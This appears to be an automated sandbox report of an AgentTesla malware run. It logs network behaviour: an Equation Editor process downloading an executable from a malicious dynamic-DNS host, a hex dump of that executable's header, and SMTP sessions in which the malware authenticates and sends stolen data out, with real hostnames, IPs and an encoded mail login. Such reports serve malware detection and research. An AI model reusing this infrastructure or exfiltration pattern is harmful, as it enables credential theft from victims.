                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . 1 q + 2 . . H . . . . . | . . ` 3 h . { 9 t . . * . . 6 . . K . . . . . . ~ . . . p . . Y . . ^ _ m N B . g . . 4 . $ . . . . / z I
                                                                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          01/27/21-09:17:20.645015TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49166587192.168.2.22208.91.199.225
                                                                                                          01/27/21-09:17:23.479047TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49167587192.168.2.22208.91.198.143

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 27, 2021 09:15:46.174457073 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.397540092 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.397635937 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.397888899 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.624223948 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.624253035 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.624265909 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.624277115 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.624528885 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.847124100 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847202063 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847240925 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847280025 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847316027 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847359896 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.847368956 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847392082 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.847414970 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847434998 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.847459078 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:46.847481966 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.847500086 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:46.847621918 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.069730043 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069772005 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069787025 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069798946 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069814920 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069830894 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069847107 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069864035 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069880009 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069895983 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069915056 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069931984 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069942951 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069955111 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069967985 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.069983959 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.070044041 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.070075989 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.070080996 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.072365999 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292237997 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292292118 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292340040 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292383909 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292422056 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292463064 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292500973 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292505026 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292525053 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292527914 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292536020 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292558908 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292573929 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292584896 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292610884 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292615891 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292658091 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292670012 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292700052 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292711020 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292737007 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292738914 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292776108 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292788029 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292814016 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292814970 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292850971 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292865038 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292889118 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292895079 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292926073 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.292938948 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292970896 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.292972088 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.293015003 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.293028116 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.293051004 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.293052912 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.293090105 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.293102980 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.293133974 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.294357061 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.294394970 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.294441938 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.294469118 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.294521093 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.294531107 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.294625998 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.295317888 CET4916580192.168.2.22103.153.76.181
                                                                                                          Jan 27, 2021 09:15:47.515434980 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.515501022 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.515539885 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.515577078 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.515614033 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.515645027 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.515683889 CET8049165103.153.76.181192.168.2.22
                                                                                                          Jan 27, 2021 09:15:47.515693903 CET4916580192.168.2.22103.153.76.181

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 27, 2021 09:15:46.101658106 CET5219753192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:15:46.163057089 CET53521978.8.8.8192.168.2.22
                                                                                                          Jan 27, 2021 09:17:18.356118917 CET5309953192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:17:18.545075893 CET53530998.8.8.8192.168.2.22
                                                                                                          Jan 27, 2021 09:17:18.545957088 CET5309953192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:17:18.602505922 CET53530998.8.8.8192.168.2.22
                                                                                                          Jan 27, 2021 09:17:18.667681932 CET5283853192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:17:18.724380016 CET53528388.8.8.8192.168.2.22
                                                                                                          Jan 27, 2021 09:17:21.248164892 CET6120053192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:17:21.451677084 CET53612008.8.8.8192.168.2.22
                                                                                                          Jan 27, 2021 09:17:21.452619076 CET6120053192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:17:21.509044886 CET53612008.8.8.8192.168.2.22
                                                                                                          Jan 27, 2021 09:17:21.509840012 CET6120053192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:17:21.571635008 CET53612008.8.8.8192.168.2.22
                                                                                                          Jan 27, 2021 09:17:21.642004967 CET4954853192.168.2.228.8.8.8
                                                                                                          Jan 27, 2021 09:17:21.698662043 CET53495488.8.8.8192.168.2.22

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Jan 27, 2021 09:15:46.101658106 CET192.168.2.228.8.8.80xaf1eStandard query (0)suresb1sndyintercont.dns.armyA (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.356118917 CET192.168.2.228.8.8.80x8282Standard query (0)smtp.migeulez.comA (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.545957088 CET192.168.2.228.8.8.80x8282Standard query (0)smtp.migeulez.comA (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.667681932 CET192.168.2.228.8.8.80xebf1Standard query (0)smtp.migeulez.comA (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.248164892 CET192.168.2.228.8.8.80xd368Standard query (0)smtp.migeulez.comA (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.452619076 CET192.168.2.228.8.8.80xd368Standard query (0)smtp.migeulez.comA (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.509840012 CET192.168.2.228.8.8.80xd368Standard query (0)smtp.migeulez.comA (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.642004967 CET192.168.2.228.8.8.80x4226Standard query (0)smtp.migeulez.comA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Jan 27, 2021 09:15:46.163057089 CET8.8.8.8192.168.2.220xaf1eNo error (0)suresb1sndyintercont.dns.army103.153.76.181A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.545075893 CET8.8.8.8192.168.2.220x8282No error (0)smtp.migeulez.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.545075893 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.545075893 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.545075893 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.545075893 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.602505922 CET8.8.8.8192.168.2.220x8282No error (0)smtp.migeulez.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.602505922 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.602505922 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.602505922 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.602505922 CET8.8.8.8192.168.2.220x8282No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.724380016 CET8.8.8.8192.168.2.220xebf1No error (0)smtp.migeulez.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.724380016 CET8.8.8.8192.168.2.220xebf1No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.724380016 CET8.8.8.8192.168.2.220xebf1No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.724380016 CET8.8.8.8192.168.2.220xebf1No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:18.724380016 CET8.8.8.8192.168.2.220xebf1No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.451677084 CET8.8.8.8192.168.2.220xd368No error (0)smtp.migeulez.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.451677084 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.451677084 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.451677084 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.451677084 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.509044886 CET8.8.8.8192.168.2.220xd368No error (0)smtp.migeulez.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.509044886 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.509044886 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.509044886 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.509044886 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.571635008 CET8.8.8.8192.168.2.220xd368No error (0)smtp.migeulez.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.571635008 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.571635008 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.571635008 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.571635008 CET8.8.8.8192.168.2.220xd368No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.698662043 CET8.8.8.8192.168.2.220x4226No error (0)smtp.migeulez.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.698662043 CET8.8.8.8192.168.2.220x4226No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.698662043 CET8.8.8.8192.168.2.220x4226No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.698662043 CET8.8.8.8192.168.2.220x4226No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                          Jan 27, 2021 09:17:21.698662043 CET8.8.8.8192.168.2.220x4226No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • suresb1sndyintercont.dns.army

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.2249165103.153.76.18180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 27, 2021 09:15:46.397888899 CET0OUTGET /receipst/winlog.exe HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                          Host: suresb1sndyintercont.dns.army
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 27, 2021 09:15:46.624223948 CET2INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 27 Jan 2021 08:15:44 GMT
                                                                                                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
                                                                                                          Last-Modified: Wed, 27 Jan 2021 06:00:08 GMT
                                                                                                          ETag: "106000-5b9db7bb52a00"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1073152
                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-msdownload
                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 0f 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c6 0e 00 00 98 01 00 00 00 00 00 9e e5 0e 00 00 20 00 00 00 00 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c e5 0e 00 4f 00 00 00 00 00 0f 00 7c 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 c5 0e 00 00 20 00 00 00 c6 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 95 01 00 00 00 0f 00 00 96 01 00 00 c8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 5e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e5 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 1c 5c 01 00 03 00 00 00 01 00 00 06 b4 9f 03 00 98 45 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 26 00 02 28 31 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELx`P @ @LO| H.text `.rsrc|@@.reloc^@BHC\E0(((o*( (!("(#($*N(op(%*&(&*s's(s)s*s+*0~o,+*0~o-+*0~o.+*0~o/+*0~o0+*&(1*0<~(2,!rp(3o4s5~+*0


                                                                                                          SMTP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Jan 27, 2021 09:17:19.568044901 CET58749166208.91.199.225192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                          Jan 27, 2021 09:17:19.568444014 CET49166587192.168.2.22208.91.199.225EHLO 980108
                                                                                                          Jan 27, 2021 09:17:19.744249105 CET58749166208.91.199.225192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                          250-PIPELINING
                                                                                                          250-SIZE 41648128
                                                                                                          250-VRFY
                                                                                                          250-ETRN
                                                                                                          250-STARTTLS
                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                          250-AUTH=PLAIN LOGIN
                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                          250-8BITMIME
                                                                                                          250 DSN
                                                                                                          Jan 27, 2021 09:17:19.746047974 CET49166587192.168.2.22208.91.199.225AUTH login ZmFjdHVyYWNpb25AbWlnZXVsZXouY29t
                                                                                                          Jan 27, 2021 09:17:19.922535896 CET58749166208.91.199.225192.168.2.22334 UGFzc3dvcmQ6
                                                                                                          Jan 27, 2021 09:17:20.101150990 CET58749166208.91.199.225192.168.2.22235 2.7.0 Authentication successful
                                                                                                          Jan 27, 2021 09:17:20.102175951 CET49166587192.168.2.22208.91.199.225MAIL FROM:<facturacion@migeulez.com>
                                                                                                          Jan 27, 2021 09:17:20.279299021 CET58749166208.91.199.225192.168.2.22250 2.1.0 Ok
                                                                                                          Jan 27, 2021 09:17:20.280035973 CET49166587192.168.2.22208.91.199.225RCPT TO:<facturacion@migeulez.com>
                                                                                                          Jan 27, 2021 09:17:20.464610100 CET58749166208.91.199.225192.168.2.22250 2.1.5 Ok
                                                                                                          Jan 27, 2021 09:17:20.465126038 CET49166587192.168.2.22208.91.199.225DATA
                                                                                                          Jan 27, 2021 09:17:20.641292095 CET58749166208.91.199.225192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                          Jan 27, 2021 09:17:20.645859957 CET49166587192.168.2.22208.91.199.225.
                                                                                                          Jan 27, 2021 09:17:20.919286013 CET58749166208.91.199.225192.168.2.22250 2.0.0 Ok: queued as 5E7F8182CBD
                                                                                                          Jan 27, 2021 09:17:22.420790911 CET58749167208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                          Jan 27, 2021 09:17:22.421289921 CET49167587192.168.2.22208.91.198.143EHLO 980108
                                                                                                          Jan 27, 2021 09:17:22.594434023 CET58749167208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                          250-PIPELINING
                                                                                                          250-SIZE 41648128
                                                                                                          250-VRFY
                                                                                                          250-ETRN
                                                                                                          250-STARTTLS
                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                          250-AUTH=PLAIN LOGIN
                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                          250-8BITMIME
                                                                                                          250 DSN
                                                                                                          Jan 27, 2021 09:17:22.594854116 CET49167587192.168.2.22208.91.198.143AUTH login ZmFjdHVyYWNpb25AbWlnZXVsZXouY29t
                                                                                                          Jan 27, 2021 09:17:22.768768072 CET58749167208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
